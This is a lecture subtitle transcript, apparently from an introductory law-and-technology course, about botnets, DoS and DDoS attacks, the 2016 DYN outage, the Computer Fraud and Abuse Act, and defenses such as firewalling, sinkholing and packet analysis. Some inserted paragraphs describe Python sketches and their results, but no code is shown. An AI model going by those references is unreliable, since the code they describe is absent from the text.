00:20:22,780 People don't notice anything about the worm or anything 391 00:20:22,780 --> 00:20:25,750 about this program that has been covertly installed on their machine. 392 00:20:25,750 --> 00:20:30,010 It doesn't do anything in particular until it is activated. 
393 00:20:30,010 --> 00:20:32,500 And then it becomes an agent or a zombie-- 394 00:20:32,500 --> 00:20:34,930 sometimes you'll hear it termed that as well-- 395 00:20:34,930 --> 00:20:36,400 controlled by the hackers. 396 00:20:36,400 --> 00:20:39,130 And so all of a sudden the adversaries gain 397 00:20:39,130 --> 00:20:42,190 control of many different devices, hundreds or thousands 398 00:20:42,190 --> 00:20:46,450 or tens of thousands, or even more in some of the bigger attacks 399 00:20:46,450 --> 00:20:50,602 that have happened, basically turning these computers-- 400 00:20:50,602 --> 00:20:52,310 rendering all of them under their control 401 00:20:52,310 --> 00:20:55,130 and being able to direct them to take whatever action they want. 402 00:20:55,130 --> 00:20:58,870 And in particular, in the case of a distributed denial of service attack, 403 00:20:58,870 --> 00:21:03,190 all of these computers are going to make web requests 404 00:21:03,190 --> 00:21:07,810 to the same server or same website, because that's the idea. 405 00:21:07,810 --> 00:21:09,180 You have so many requests. 406 00:21:09,180 --> 00:21:10,930 With distributed denial of service attacks 407 00:21:10,930 --> 00:21:13,972 or just regular denial of service attacks, it's just a question of scale, 408 00:21:13,972 --> 00:21:15,610 really. 409 00:21:15,610 --> 00:21:18,430 We're hitting those servers with so many web requests. 410 00:21:18,430 --> 00:21:19,390 I want to access this. 411 00:21:19,390 --> 00:21:22,210 I want to access this, hundreds, thousands, tens of thousands 412 00:21:22,210 --> 00:21:26,110 of these requests a second such that the computer can't possibly-- the server 413 00:21:26,110 --> 00:21:28,210 can't possibly field all of these inquiries 414 00:21:28,210 --> 00:21:33,010 that are coming and trying to give these requests the data they're asking for. 
415 00:21:33,010 --> 00:21:35,425 Ultimately, that would eventually, after enough time, 416 00:21:35,425 --> 00:21:38,300 result in the server just crashing, throwing up its hands and saying, 417 00:21:38,300 --> 00:21:39,430 I don't know what to do. 418 00:21:39,430 --> 00:21:41,388 I can't possibly process all of these requests. 419 00:21:41,388 --> 00:21:45,010 But by tying it up in this way, the adversary 420 00:21:45,010 --> 00:21:49,840 has succeeded in damaging the infrastructure of the server. 421 00:21:49,840 --> 00:21:52,960 It's either denied the server the ability to process customers 422 00:21:52,960 --> 00:21:55,840 and payments or it's just taken down the entire website 423 00:21:55,840 --> 00:21:58,840 so there's no information available about the company anymore to anybody 424 00:21:58,840 --> 00:22:01,630 who's trying to look it up. 425 00:22:01,630 --> 00:22:04,990 These attacks are actually really, really common. 426 00:22:04,990 --> 00:22:06,910 There are some surveys that have been out that 427 00:22:06,910 --> 00:22:12,292 assess that roughly one sixth to one third of average-sized businesses that 428 00:22:12,292 --> 00:22:14,500 are part of this tech survey that goes out every year 429 00:22:14,500 --> 00:22:20,680 suffer some sort of DoS attack in a given year, so 16% to 35% or so 430 00:22:20,680 --> 00:22:23,910 of business, which is a lot of businesses when you think about it. 431 00:22:23,910 --> 00:22:25,660 And these attacks are usually quite small, 432 00:22:25,660 --> 00:22:27,610 and they're certainly not newsworthy. 433 00:22:27,610 --> 00:22:28,870 They might last a few minutes. 434 00:22:28,870 --> 00:22:30,190 They might last a few hours. 435 00:22:30,190 --> 00:22:31,690 But they're enough to be disruptive. 436 00:22:31,690 --> 00:22:32,898 They're certainly noteworthy. 437 00:22:32,898 --> 00:22:36,310 And they're something to avoid if it's possible. 
438 00:22:36,310 --> 00:22:41,660 Cloud computing has made this problem kind of worse. 439 00:22:41,660 --> 00:22:45,190 And the reason for this is that, in a cloud computing context, 440 00:22:45,190 --> 00:22:47,980 your server that is running your business 441 00:22:47,980 --> 00:22:50,350 is not physically located on your premises. 442 00:22:50,350 --> 00:22:54,270 It was often the case that when a business would run a website 443 00:22:54,270 --> 00:23:00,430 or would run their business, they would have a server room that 444 00:23:00,430 --> 00:23:03,790 had the software that was necessary to run their website 445 00:23:03,790 --> 00:23:07,060 or to run whatever software-based services they provided. 446 00:23:07,060 --> 00:23:10,415 And it was all local to that business. 447 00:23:10,415 --> 00:23:12,980 No one else could possibly be affected. 448 00:23:12,980 --> 00:23:15,070 But in a cloud computing context, we are generally 449 00:23:15,070 --> 00:23:20,860 renting server space and server power from an entity such as Amazon Web 450 00:23:20,860 --> 00:23:24,790 Services, or Google Cloud Services, or some other large provider where 451 00:23:24,790 --> 00:23:30,460 it might be that 10, 20, 50, depending on the size of the business in question 452 00:23:30,460 --> 00:23:31,510 here-- 453 00:23:31,510 --> 00:23:35,920 multiple businesses are sharing the same physical resources, 454 00:23:35,920 --> 00:23:37,990 and they're sharing the same server space, 455 00:23:37,990 --> 00:23:41,260 such that if any one of those 50, let's say, 456 00:23:41,260 --> 00:23:44,950 businesses is targeted by hackers or adversaries 457 00:23:44,950 --> 00:23:49,570 for a denial of service attack, that might actually, as collateral damage, 458 00:23:49,570 --> 00:23:52,390 take out the other 49 businesses. 459 00:23:52,390 --> 00:23:54,400 They weren't even part of the attack. 
460 00:23:54,400 --> 00:23:55,930 But cloud computing is-- 461 00:23:55,930 --> 00:23:57,820 we've heard about it as it's a great thing. 462 00:23:57,820 --> 00:24:00,640 It allows us to scale out our websites, make it 463 00:24:00,640 --> 00:24:02,800 so that we can handle more customers. 464 00:24:02,800 --> 00:24:06,280 It takes away the problem of security, web-based security, 465 00:24:06,280 --> 00:24:11,090 because we're outsourcing that to the cloud provider to give that to us. 466 00:24:11,090 --> 00:24:15,490 But it now introduces this new problem of, if we're all sharing the resources 467 00:24:15,490 --> 00:24:18,790 and any one of us gets attacked, then all of us 468 00:24:18,790 --> 00:24:21,760 lose the ability to access those resources and use them, 469 00:24:21,760 --> 00:24:24,550 which might cause all of our organizations to suffer 470 00:24:24,550 --> 00:24:28,090 the consequences of one single attack. 471 00:24:28,090 --> 00:24:30,700 This collateral damage can get even worse 472 00:24:30,700 --> 00:24:33,050 when you think about servers that are-- 473 00:24:33,050 --> 00:24:38,590 or businesses whose service is providing the internet, OK? 474 00:24:38,590 --> 00:24:40,970 So a very common example of this, or a noteworthy example 475 00:24:40,970 --> 00:24:44,260 of this, happened in 2016 with a service called 476 00:24:44,260 --> 00:24:49,480 DYN, D-Y-N. DYN is a DNS service provider, 477 00:24:49,480 --> 00:24:52,390 DNS being the domain name system. 478 00:24:52,390 --> 00:25:00,450 And the idea there is to map the things like www.google.com to its IP address. 479 00:25:00,450 --> 00:25:02,950 Because in order to actually access anything on the internet 480 00:25:02,950 --> 00:25:06,140 or to have a communication with anyone, you need to know their IP address. 
481 00:25:06,140 --> 00:25:09,220 And as human beings, we tend not to actually remember 482 00:25:09,220 --> 00:25:14,020 what some website's IP address is, much like we may not recall a certain phone 483 00:25:14,020 --> 00:25:14,590 number. 484 00:25:14,590 --> 00:25:17,170 But if it has a mnemonic attached to it-- so for example, 485 00:25:17,170 --> 00:25:20,530 you know back in the day we had 1-800-COLLECT for collect calls. 486 00:25:20,530 --> 00:25:25,750 If you forgot the number, the literal digits of that phone number, 487 00:25:25,750 --> 00:25:29,290 you could still remember the idea of it because you had this mnemonic device 488 00:25:29,290 --> 00:25:30,760 to help remind you. 489 00:25:30,760 --> 00:25:35,110 Domain names, www.whatever.com, are just mnemonic devices 490 00:25:35,110 --> 00:25:37,570 that we use to refer to an IP address. 491 00:25:37,570 --> 00:25:41,770 And DNS servers provide this service to us. 492 00:25:41,770 --> 00:25:46,990 DYN is one of the major DNS providers for the internet overall. 493 00:25:46,990 --> 00:25:49,630 And if a denial of service attack, or in this case 494 00:25:49,630 --> 00:25:53,800 it was certainly a distributed denial of service attack because it was enormous, 495 00:25:53,800 --> 00:25:58,480 goes after pinging the IP address or hitting that server over 496 00:25:58,480 --> 00:26:03,070 and over and over, then it is unable to field requests from anyone else, 497 00:26:03,070 --> 00:26:06,880 because it's just getting pummeled by all of these requests from some botnet 498 00:26:06,880 --> 00:26:11,250 that some adversary or collective of adversaries has taken control of. 
499 00:26:11,250 --> 00:26:13,990 This, the collateral damage, is no one can ever 500 00:26:13,990 --> 00:26:17,110 map a domain name to an IP address, which 501 00:26:17,110 --> 00:26:19,720 means no one can visit any of these websites 502 00:26:19,720 --> 00:26:24,250 unless you happen to know at the outset what the IP address of any given 503 00:26:24,250 --> 00:26:24,850 website was. 504 00:26:24,850 --> 00:26:27,243 If you knew the IP address, this wasn't a problem. 505 00:26:27,243 --> 00:26:29,410 You could just still directly go to that IP address. 506 00:26:29,410 --> 00:26:31,000 That's not the kind of attack here. 507 00:26:31,000 --> 00:26:33,460 But the attack instead tied up the ability 508 00:26:33,460 --> 00:26:38,410 to translate these mnemonic names into numbers. 509 00:26:38,410 --> 00:26:42,400 And as you can see, DYN was a DNS-- or is 510 00:26:42,400 --> 00:26:45,490 a DNS provider for much of the eastern half of the United States 511 00:26:45,490 --> 00:26:48,842 as well as the Pacific Northwest and California. 512 00:26:48,842 --> 00:26:50,800 And if you think about what kinds of businesses 513 00:26:50,800 --> 00:26:53,950 are headquartered in the Pacific Northwest 514 00:26:53,950 --> 00:26:58,810 and in California and in the New York area, for example, 515 00:26:58,810 --> 00:27:01,060 you probably see that some major, major services, 516 00:27:01,060 --> 00:27:03,435 including GitHub, which we've already talked about today, 517 00:27:03,435 --> 00:27:06,190 but also Facebook and others-- 518 00:27:06,190 --> 00:27:09,940 Harvard University's website was also taken down for several hours. 519 00:27:09,940 --> 00:27:12,320 This attack lasted about 10 hours, so quite prolonged. 520 00:27:12,320 --> 00:27:15,810 It really did a lot of damage on that day. 521 00:27:15,810 --> 00:27:18,310 It really crippled the ability of people to use the internet 522 00:27:18,310 --> 00:27:22,420 for a long period of time, so kind of very interesting. 
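To make the DNS point concrete, here is a minimal Python sketch of why a literal IP address kept working during that outage while names did not. It is a toy model, not how a real resolver works: the RECORDS table, the 192.0.2.10 address (from a range reserved for documentation), and the function names are all assumptions made up for illustration.

```python
import ipaddress

# Hypothetical name-to-address table standing in for a DNS provider.
RECORDS = {"www.example.com": "192.0.2.10"}


class ResolverUnavailable(Exception):
    """Raised when the toy DNS provider is too overwhelmed to answer."""


def resolve(name, provider_up):
    # A provider that is being flooded cannot translate any name.
    if not provider_up:
        raise ResolverUnavailable(f"cannot resolve {name}")
    return RECORDS[name]


def address_for(target, provider_up):
    # A literal IP address needs no lookup, so it bypasses DNS entirely.
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        # Not an IP address, so it must be a name that needs translating.
        return resolve(target, provider_up)
```

With the provider up, address_for("www.example.com", True) returns the mapped address. With it down, the same call raises ResolverUnavailable, while address_for("192.0.2.10", False) still succeeds because no translation is needed.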
523 00:27:22,420 --> 00:27:28,330 This article also talks a bit about how the United States government has 524 00:27:28,330 --> 00:27:31,450 decided to-- or legislature-- 525 00:27:31,450 --> 00:27:35,293 handle these kinds of issues, computer-based attacks. 526 00:27:35,293 --> 00:27:37,460 It takes a look at the Computer Fraud and Abuse 527 00:27:37,460 --> 00:27:41,290 Act, which is codified at 18 USC 1030. 528 00:27:41,290 --> 00:27:47,020 And this is really the only computer crimes, general computer crimes, 529 00:27:47,020 --> 00:27:49,990 law that is on the books and talks about what 530 00:27:49,990 --> 00:27:53,710 it means to be a protected computer. 531 00:27:53,710 --> 00:27:57,430 And you'll be interested to know perhaps that any computer pretty much is 532 00:27:57,430 --> 00:27:58,780 a protected computer. 533 00:27:58,780 --> 00:28:02,320 The law specifically calls out government computers as well as 534 00:28:02,320 --> 00:28:04,990 any computer that may be involved in interstate commerce, 535 00:28:04,990 --> 00:28:08,200 which is you can imagine anybody who uses the internet, 536 00:28:08,200 --> 00:28:11,030 their computer then falls under the ambit of this act. 537 00:28:11,030 --> 00:28:13,030 So it's another interesting thing to take a look 538 00:28:13,030 --> 00:28:20,320 at if you're interested in how we deal with processing or prosecuting 539 00:28:20,320 --> 00:28:23,020 computer-based crimes. 540 00:28:23,020 --> 00:28:26,330 All of it is actually sort of dealt with in the Computer Fraud and Abuse 541 00:28:26,330 --> 00:28:29,500 Act, which is not terribly long and hasn't been updated extensively 542 00:28:29,500 --> 00:28:32,150 since the 1980s other than some small amendments.
543 00:28:32,150 --> 00:28:34,150 So it's kind of interesting that we have not yet 544 00:28:34,150 --> 00:28:38,440 gotten to the point where we are defining and prosecuting 545 00:28:38,440 --> 00:28:42,400 specific types of computer crime, even though we've begun to figure out 546 00:28:42,400 --> 00:28:47,620 different types of computer crimes, such as DoS attacks, such as phishing, 547 00:28:47,620 --> 00:28:49,370 and so on. 548 00:28:49,370 --> 00:28:52,690 Now, hypothetically, a simple denial of service attack 549 00:28:52,690 --> 00:28:53,950 should be pretty easy to stop. 550 00:28:53,950 --> 00:28:59,230 And the reason for that is that there's only one person making the attack. 551 00:28:59,230 --> 00:29:03,130 All web requests, recall, happen via HTTP. 552 00:29:03,130 --> 00:29:07,585 And the IP packets that carry HTTP require that the sender's IP address 553 00:29:07,585 --> 00:29:09,460 be part of that envelope that gets sent over, 554 00:29:09,460 --> 00:29:12,880 such that the server who wants to respond to the client, or the sender, 555 00:29:12,880 --> 00:29:13,980 can just reference it. 556 00:29:13,980 --> 00:29:14,980 It's the return address. 557 00:29:14,980 --> 00:29:17,438 You need to be able to know where to send the data back to. 558 00:29:17,438 --> 00:29:19,680 And so any request that is coming from-- 559 00:29:19,680 --> 00:29:21,430 there are thousands of requests that might 560 00:29:21,430 --> 00:29:23,680 be coming from a single IP address. 561 00:29:23,680 --> 00:29:27,490 If you see that happening, you can just decide as a server in the software 562 00:29:27,490 --> 00:29:31,570 to stop accepting requests from that address. 563 00:29:31,570 --> 00:29:34,360 DDoS attacks, distributed denial of service attacks, 564 00:29:34,360 --> 00:29:36,160 are much harder to stop. 565 00:29:36,160 --> 00:29:40,390 And it's exactly because of the fact that there is not a single source.
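The single-source case can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the class name SingleSourceBlocker and the max_requests threshold are hypothetical, and a real server would count requests per time window rather than forever.

```python
from collections import Counter


class SingleSourceBlocker:
    """Toy per-address filter: refuse an address once it sends too many requests."""

    def __init__(self, max_requests):
        self.max_requests = max_requests  # hypothetical threshold
        self.counts = Counter()           # requests seen per source address
        self.blocked = set()              # addresses we no longer answer

    def allow(self, ip):
        if ip in self.blocked:
            return False
        self.counts[ip] += 1
        if self.counts[ip] > self.max_requests:
            # Too many requests from one return address: stop accepting them.
            self.blocked.add(ip)
            return False
        return True
```

With a threshold of 3, the fourth and later requests from the same address are refused while other addresses are unaffected. A botnet sidesteps exactly this kind of filter, because each of its many addresses can stay under the threshold.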
566 00:29:40,390 --> 00:29:42,880 If there's a single source, again, we would just completely 567 00:29:42,880 --> 00:29:48,250 stop accepting any requests of any type from that computer. 568 00:29:48,250 --> 00:29:51,370 However, because we have so many different computers to contend with, 569 00:29:51,370 --> 00:29:54,010 the options to handle this are a bit more limited. 570 00:29:54,010 --> 00:29:57,400 There are some techniques for averting them or stopping them 571 00:29:57,400 --> 00:30:01,960 once they are detected, however, the first of which is firewalling. 572 00:30:01,960 --> 00:30:04,270 So the idea of a firewall is we are only going 573 00:30:04,270 --> 00:30:06,700 to allow requests of a certain type. 574 00:30:06,700 --> 00:30:08,950 We're going to allow them from any IP address, 575 00:30:08,950 --> 00:30:11,950 but we're only going to accept them into this port. 576 00:30:11,950 --> 00:30:15,880 Recall that TCP/IP gives us the ability to say this service 577 00:30:15,880 --> 00:30:19,390 comes in via this port, so HTTP requests come in via port 80. 578 00:30:19,390 --> 00:30:24,360 HTTPS requests come in via port 443. 579 00:30:24,360 --> 00:30:27,030 So imagine a distributed denial of service attack 580 00:30:27,030 --> 00:30:33,100 where typically the site would expect to be receiving requests on HTTPS. 581 00:30:33,100 --> 00:30:37,650 It generally only uses secured HTTP in order 582 00:30:37,650 --> 00:30:40,300 to process whatever requests are coming in. 583 00:30:40,300 --> 00:30:44,160 So it's expecting to receive a lot of traffic on port 443. 584 00:30:44,160 --> 00:30:47,970 And then all of a sudden a distributed denial of service attack 585 00:30:47,970 --> 00:30:51,930 begins and it's receiving lots of requests on port 80.
586 00:30:51,930 --> 00:30:55,440 One way to stop that attack before it starts to tie up resources 587 00:30:55,440 --> 00:30:57,540 is to just put a firewall up and say, I'm 588 00:30:57,540 --> 00:31:00,210 not actually going to accept any requests on port 80. 589 00:31:00,210 --> 00:31:03,650 And this may have a side effect of denying certain legitimate requests 590 00:31:03,650 --> 00:31:04,710 from getting through. 591 00:31:04,710 --> 00:31:07,920 But since the vast majority of the traffic that I receive on the site 592 00:31:07,920 --> 00:31:12,805 comes in via HTTPS on port 443, that's a small price to pay. 593 00:31:12,805 --> 00:31:15,180 I'd rather just allow the legitimate requests to come in. 594 00:31:15,180 --> 00:31:17,140 So that's one technique. 595 00:31:17,140 --> 00:31:19,950 Another technique is something called sinkholing. 596 00:31:19,950 --> 00:31:22,350 And it's exactly what you probably think it is. 597 00:31:22,350 --> 00:31:24,860 So a sinkhole, as you probably know, is a hole 598 00:31:24,860 --> 00:31:26,610 in the ground that swallows everything up. 599 00:31:26,610 --> 00:31:32,730 And a sink hole in digital context is a big black hole, basically, for data. 600 00:31:32,730 --> 00:31:34,890 It's just going to swallow up every single request 601 00:31:34,890 --> 00:31:36,960 and just not allow any of them out. 602 00:31:36,960 --> 00:31:39,962 So this would, again, stop the denial of service attack 603 00:31:39,962 --> 00:31:41,670 because it's just taking all the requests 604 00:31:41,670 --> 00:31:44,190 and basically throwing them in the trash. 605 00:31:44,190 --> 00:31:48,120 This won't take down the website of the company that's being attacked, 606 00:31:48,120 --> 00:31:49,590 so that's a good thing. 607 00:31:49,590 --> 00:31:52,590 But it's also not going to allow any legitimate traffic of any type 608 00:31:52,590 --> 00:31:54,460 through, so that might be a bad thing. 
609 00:31:54,460 --> 00:31:56,460 But depending on the length of the attack, if it 610 00:31:56,460 --> 00:31:59,520 seems like it's going to be short, if the requests trickle off 611 00:31:59,520 --> 00:32:02,670 and stop because the attackers realize, we're not making any progress, 612 00:32:02,670 --> 00:32:04,020 we're not actually doing-- 613 00:32:04,020 --> 00:32:06,510 we're not getting the results that we had hoped for, 614 00:32:06,510 --> 00:32:08,490 then perhaps they would give up. 615 00:32:08,490 --> 00:32:11,903 Then the sinkhole could be stopped and regular traffic 616 00:32:11,903 --> 00:32:13,320 could start to flow through again. 617 00:32:13,320 --> 00:32:16,590 So a sinkhole is basically just take all the traffic that comes in 618 00:32:16,590 --> 00:32:18,665 and just throw it in the trash. 619 00:32:18,665 --> 00:32:20,665 And then finally, another technique we could use 620 00:32:20,665 --> 00:32:22,950 is something called packet analysis. 621 00:32:22,950 --> 00:32:27,390 So again, HTTP we know is requests via the web. 622 00:32:27,390 --> 00:32:30,120 And we learned a little bit that we have headers 623 00:32:30,120 --> 00:32:33,060 that are packaged alongside those HTTP packets 624 00:32:33,060 --> 00:32:38,010 where the request originated from, where it's going to. 625 00:32:38,010 --> 00:32:40,440 There's a whole lot of other metadata as well. 626 00:32:40,440 --> 00:32:44,250 You'll know, for example, what type of browser the individual is using 627 00:32:44,250 --> 00:32:46,290 and what operating system perhaps they are using 628 00:32:46,290 --> 00:32:50,950 and where, as in sort of a geographical generalization, are they. 629 00:32:50,950 --> 00:32:52,440 Are they in the US Northeast? 630 00:32:52,440 --> 00:32:55,350 Are they in South America and so on? 
631 00:32:55,350 --> 00:32:59,160 Instead of deciding to restrict traffic via specific ports 632 00:32:59,160 --> 00:33:03,540 or just restrict all traffic, we could still allow all traffic to come in 633 00:33:03,540 --> 00:33:06,460 but inspect all of the packets as they come in. 634 00:33:06,460 --> 00:33:09,060 So for example, perhaps most of the traffic on our site we 635 00:33:09,060 --> 00:33:11,650 are expecting to come from the-- 636 00:33:11,650 --> 00:33:13,400 just because I used that example already-- 637 00:33:13,400 --> 00:33:14,700 US Northeast. 638 00:33:14,700 --> 00:33:16,650 And then all of a sudden we are experiencing 639 00:33:16,650 --> 00:33:20,640 tons of packets coming in that have IP addresses that all seem to be based-- 640 00:33:20,640 --> 00:33:24,050 or they have, as part of their packets, information 641 00:33:24,050 --> 00:33:25,800 that says that they're from South America, 642 00:33:25,800 --> 00:33:29,790 or they're from the US West Coast, or somewhere else that we don't expect. 643 00:33:29,790 --> 00:33:32,430 We can decide, after taking a quick look at that packet 644 00:33:32,430 --> 00:33:36,240 and analyzing those individual headers, that I'm not 645 00:33:36,240 --> 00:33:39,240 going to accept any packets from that location. 646 00:33:39,240 --> 00:33:42,970 The ones that match locations I'm expecting, I'll let through. 647 00:33:42,970 --> 00:33:45,948 And this, again, might prevent certain customers from getting through, 648 00:33:45,948 --> 00:33:48,990 certain legitimate customers who might actually be based in South America 649 00:33:48,990 --> 00:33:50,460 from getting through. 650 00:33:50,460 --> 00:33:54,980 But in general, it's going to block most of the damaging traffic. 651 00:33:54,980 --> 00:33:57,900 DDoS attacks are really frustrating for companies 652 00:33:57,900 --> 00:34:01,470 because they really can do a lot of damage. 
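The three techniques described above, firewalling, sinkholing, and packet analysis, can be compared side by side in a short Python sketch. Everything here is an assumption for illustration: the Request record, the region labels, and the function names are hypothetical, and real filtering happens in network equipment rather than in application code like this.

```python
from dataclasses import dataclass


@dataclass
class Request:
    source_ip: str
    port: int
    region: str  # hypothetical label derived from packet metadata


def firewall(req, allowed_ports=frozenset({443})):
    # Firewalling: accept any source, but only on the ports we expect.
    return req.port in allowed_ports


def sinkhole(req):
    # Sinkholing: swallow every request, legitimate or not.
    return False


def packet_analysis(req, expected_regions=frozenset({"us-northeast"})):
    # Packet analysis: inspect each request and keep only expected origins.
    return req.region in expected_regions


traffic = [
    Request("198.51.100.1", 443, "us-northeast"),   # typical customer
    Request("203.0.113.9", 80, "south-america"),    # unexpected port and region
    Request("203.0.113.10", 443, "south-america"),  # expected port, unexpected region
]
```

Running each filter over the sample traffic shows the trade-off: the firewall lets the third request through, the sinkhole drops everything including the customer, and packet analysis drops both South American requests, including any legitimate customer who happens to be there.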
653 00:34:01,470 --> 00:34:04,480 Usually the resources of the company will eventually-- especially 654 00:34:04,480 --> 00:34:08,280 if they're cloud-based and they rely on their cloud provider to help them 655 00:34:08,280 --> 00:34:12,290 scale up, usually the resources of the company being attacked 656 00:34:12,290 --> 00:34:14,699 are enough to eventually overwhelm and stop 657 00:34:14,699 --> 00:34:18,780 the attacker who usually has a much more limited set of resources. 658 00:34:18,780 --> 00:34:22,570 But again, depending on the type of business being attacked in this way-- 659 00:34:22,570 --> 00:34:25,580 again, think of the example of DYN, the DNS provider. 660 00:34:25,580 --> 00:34:27,330 The ramifications for one of these attacks 661 00:34:27,330 --> 00:34:31,350 can be really quite severe and really quite annoying and costly 662 00:34:31,350 --> 00:34:34,480 for a business that suffers it. 663 00:34:34,480 --> 00:34:38,050 So we just talked about HTTP and HTTPS a moment ago 664 00:34:38,050 --> 00:34:40,050 when we were talking about firewalling, allowing 665 00:34:40,050 --> 00:34:42,790 some traffic on some of the ports but not other ports, 666 00:34:42,790 --> 00:34:47,290 so maybe allowing HTTPS traffic but not HTTP traffic. 667 00:34:47,290 --> 00:34:51,120 Let's take a look at these two technologies in a bit more detail. 668 00:34:51,120 --> 00:34:54,330 So HTTP, again, is the hypertext transfer protocol. 669 00:34:54,330 --> 00:34:58,530 It is how hypertext or web pages are transmitted over the internet. 670 00:34:58,530 --> 00:35:04,530 If I am a client and I make a request to you for some HTML content, 671 00:35:04,530 --> 00:35:08,130 then you as a server would send a response back to me, 672 00:35:08,130 --> 00:35:11,550 and then I would be able to see the page that I had requested. 673 00:35:11,550 --> 00:35:17,090 And every HTTP request has a specific format at the beginning of it.
674 00:35:17,090 --> 00:35:24,560 For example, we might see something like this, GET /execed HTTP/1.1, host: 675 00:35:24,560 --> 00:35:25,790 law.harvard.edu. 676 00:35:25,790 --> 00:35:28,670 Let's just quickly pick these apart again one more time. 677 00:35:28,670 --> 00:35:31,910 If you see GET at the beginning of an HTTP request, 678 00:35:31,910 --> 00:35:36,680 it means please fetch or get for me, literally, this page. 679 00:35:36,680 --> 00:35:40,970 The page I'm requesting specifically is /execed. 680 00:35:40,970 --> 00:35:46,520 And the host that I'm asking it from is, in this case, law.harvard.edu. 681 00:35:46,520 --> 00:35:50,690 So basically what I'm saying here is please fetch for me, 682 00:35:50,690 --> 00:35:54,120 or retrieve for me, the HTML content that comprises 683 00:35:54,120 --> 00:36:00,410 http://law.harvard.edu/execed. 684 00:36:00,410 --> 00:36:05,990 And specifically I'm doing this using HTTP protocol version 1.1. 685 00:36:05,990 --> 00:36:08,270 We're still using version 1.1 even though I 686 00:36:08,270 --> 00:36:13,250 believe version 2 was standardized back in 2015. 687 00:36:13,250 --> 00:36:17,030 And basically this is just HTTP's way of identifying 688 00:36:17,030 --> 00:36:19,040 how you're asking the question. 689 00:36:19,040 --> 00:36:23,540 So it's similar to me making a request and saying, oh, by the way, 690 00:36:23,540 --> 00:36:26,690 the rest of this request is written in French, or, oh, by the way, 691 00:36:26,690 --> 00:36:29,630 the rest of this request is written in Spanish. 692 00:36:29,630 --> 00:36:32,750 It's more like here are the parameters that you 693 00:36:32,750 --> 00:36:35,150 should expect to see because this request is 694 00:36:35,150 --> 00:36:39,540 in version 1.1, which differed non-trivially from version 1.0. 695 00:36:39,540 --> 00:36:45,590 So it's just an identifier for how exactly we are formatting our request.
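To see how those pieces fit together, here is a minimal Python sketch that picks apart the same example request. It is a simplification, assuming a well-formed request with no body; the parse_request function is a hypothetical helper written for this illustration, not part of any library.

```python
def parse_request(raw):
    """Split a simple HTTP/1.x request into its request line and headers."""
    head = raw.split("\r\n\r\n", 1)[0]        # ignore any body after the blank line
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ")  # e.g. GET /execed HTTP/1.1
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


raw = "GET /execed HTTP/1.1\r\nHost: law.harvard.edu\r\n\r\n"
method, path, version, headers = parse_request(raw)

# Host plus path gives back the address being asked for.
url = f"http://{headers['host']}{path}"
```

Here method is the verb (GET), path is the page being requested, version says how the rest of the request is formatted, and url ends up as http://law.harvard.edu/execed.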
696 00:36:45,590 --> 00:36:47,950 But HTTP is not encrypted. 697 00:36:47,950 --> 00:36:51,232 And so if we think about making a request to a server, 698 00:36:51,232 --> 00:36:52,940 if we're the client on the left and we're 699 00:36:52,940 --> 00:36:56,120 making a request to a server on the right, it might go something like this. 700 00:36:56,120 --> 00:37:00,530 Because the odds are pretty low that, if we're making a request, 701 00:37:00,530 --> 00:37:03,350 we are so close to the server that would serve 702 00:37:03,350 --> 00:37:05,660 that request to us that it wouldn't need to hop 703 00:37:05,660 --> 00:37:07,480 through any routers along the way. 704 00:37:07,480 --> 00:37:09,410 Remember, routers, their purpose in life is 705 00:37:09,410 --> 00:37:11,260 to send traffic in the right direction. 706 00:37:11,260 --> 00:37:13,350 And they contain a table of information that says, 707 00:37:13,350 --> 00:37:15,800 oh, if I'm making a request to some server over there, 708 00:37:15,800 --> 00:37:18,920 then the best path is to go here, and then I'll send it over there, 709 00:37:18,920 --> 00:37:20,890 and then it will send it there. 710 00:37:20,890 --> 00:37:23,480 Their job is to optimize and find the best path 711 00:37:23,480 --> 00:37:26,370 to get the request to where it needs to be. 712 00:37:26,370 --> 00:37:31,145 So if I'm initiating a request to, as the client, the server, 713 00:37:31,145 --> 00:37:33,020 it's going to first go through router A who's 714 00:37:33,020 --> 00:37:35,760 going to say, OK, I'm going to move it closer to the server 715 00:37:35,760 --> 00:37:38,960 so that it receives that request, goes to router B, goes to router C. 716 00:37:38,960 --> 00:37:41,900 And eventually router C perhaps is close enough to the server 717 00:37:41,900 --> 00:37:45,380 that it can just hand off the request directly. 
718 00:37:45,380 --> 00:37:48,568 The server's then going to get that request, read it as HTTP/1.1, 719 00:37:48,568 --> 00:37:51,860 look at all the other metadata inside of the request to see if there's anything 720 00:37:51,860 --> 00:37:55,030 else that it's being asked for, and then it's going to send the information 721 00:37:55,030 --> 00:37:55,530 back. 722 00:37:55,530 --> 00:37:57,620 And in this example I'm having it go back 723 00:37:57,620 --> 00:38:00,860 exactly through the same chain of routers but in reverse. 724 00:38:00,860 --> 00:38:02,540 But in reality, that might be different. 725 00:38:02,540 --> 00:38:04,430 It might not go through the exact same three 726 00:38:04,430 --> 00:38:06,620 routers in this example in reverse. 727 00:38:06,620 --> 00:38:12,110 It might actually go from C to A to B, back to A depending on traffic 728 00:38:12,110 --> 00:38:14,780 that's happening on the network and how congested things are 729 00:38:14,780 --> 00:38:19,310 and whether there might be a new path that is better in the amount of time 730 00:38:19,310 --> 00:38:23,210 it took to process the request that I asked for. 731 00:38:23,210 --> 00:38:25,880 But remember, HTTP, not secured. 732 00:38:25,880 --> 00:38:26,720 Not encrypted. 733 00:38:26,720 --> 00:38:29,000 This is plain, over-the-air communication. 734 00:38:29,000 --> 00:38:33,560 We saw previously, when we took a look at a screenshot 735 00:38:33,560 --> 00:38:36,530 from a tool called Wireshark, that it's not 736 00:38:36,530 --> 00:38:41,420 that difficult on an unsecured network using an unsecured protocol to read, 737 00:38:41,420 --> 00:38:44,150 literally, the contents of those packets going to and from. 738 00:38:44,150 --> 00:38:46,320 So that's a vulnerability here for sure. 739 00:38:46,320 --> 00:38:48,980 Another vulnerability is any one of these computers 740 00:38:48,980 --> 00:38:51,060 along the way could be compromised. 
